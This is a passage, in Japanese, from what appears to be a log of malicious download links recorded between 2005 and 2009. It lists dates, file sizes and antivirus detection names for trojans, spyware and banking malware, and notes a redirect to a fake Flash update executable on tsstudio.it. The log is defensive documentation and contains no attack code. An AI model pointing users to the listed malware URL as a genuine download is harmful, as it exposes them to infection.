すぐにアドレスが //tsstudio.it/get_flash_update.exe に変わり、「ページを表示できません」となる。 |
[2008/12/30] | 一瞬、こんな感じ のページを表示するが、ウィルス名:JS_AGENT.AAIV を検出。
すぐにアドレスが //tsstudio.it/get_flash_update.exe に変わり、「ページを表示できません」となる。 |
[2009/06/01] | ファイルサイズ:260 KB 。ウィルス名:TROJ_GENERIC.DIT |
[2009/06/01] | ファイルサイズ:260 KB 。バスター無反応だが、多くのウィルス駆除ソフトで反応がある。 |
[2009/06/01] | ファイルサイズ:116 KB 。ウィルス名:TROJ_KILLAV.AEP |
[2009/06/01] | ファイルサイズ:22.5 KB 。ウィルス名:POSSIBLE_MOVLY-1 |
[2009/06/01] | ファイルサイズ:26.1 KB 。ウィルス名:POSSIBLE_MOVLY-1 |
[2009/07/04] | 再確認。ファイルサイズ:28.1 KB 。ウィルス名:TSPY_LDPINCH.AY |
[2009/06/01] | ファイルサイズ:22.6 KB 。ウィルス名:POSSIBLE_MOVLY-1 |
[2009/06/01] | ファイルサイズ:24.0 KB 。ウィルス名:MAL_OLGM-23 |
[2009/06/01] | ファイルサイズ:26.6 KB 。ウィルス名:MAL_OLGM-23 |
[2009/06/01] | ファイルサイズ:26.1 KB 。ウィルス名:POSSIBLE_MOVLY-1 |
[2009/06/01] | ファイルサイズ:38.0 KB 。ウィルス名:PAK_GENERIC.001 |
[2009/06/01] | ファイルサイズ:22.6 KB 。ウィルス名:TROJ_VB.GYC |
[2009/06/01] | ファイルサイズ:22.1 KB 。ウィルス名:POSSIBLE_MOVLY-1 |
[2009/06/01] | ファイルサイズ:25.5 KB 。ウィルス名:POSSIBLE_MOVLY-1 |
[2009/06/01] | ファイルサイズ:22.1 KB 。ウィルス名:MAL_OLGM-23 |
[2009/06/01] | ファイルサイズ:29.0 KB 。ウィルス名:TROJ_DROPPER.MER |
[2005/04/24] | ウィルス名:ADW_TVMEDIA.DR |
[2009/01/24] | やたらと長い名前のzipファイルが落ちてくる。
解凍すると「e562confidencial.com」という名前のファイルが現れるが、ウィルス名:TROJ_DLOADER.ND として対応済。 Kaspersky ではウィルス名:Trojan-Downloader.Win32.Banload.zxb を検出するらしい。 |
[2006/08/13] | //www2.strangeworld.org/uedakana/ に飛ぶ。 |
[2008/09/14] | ウィルス名:TSC_GENCLEAN+PAK_Generic.006 |
[2008/11/15] | ファイルサイズ:3.35MB 。ウィルス名:ADW_NSIS.AD |
[2007/02/19] | ウィルス名:TSPY_BANKER.FSW |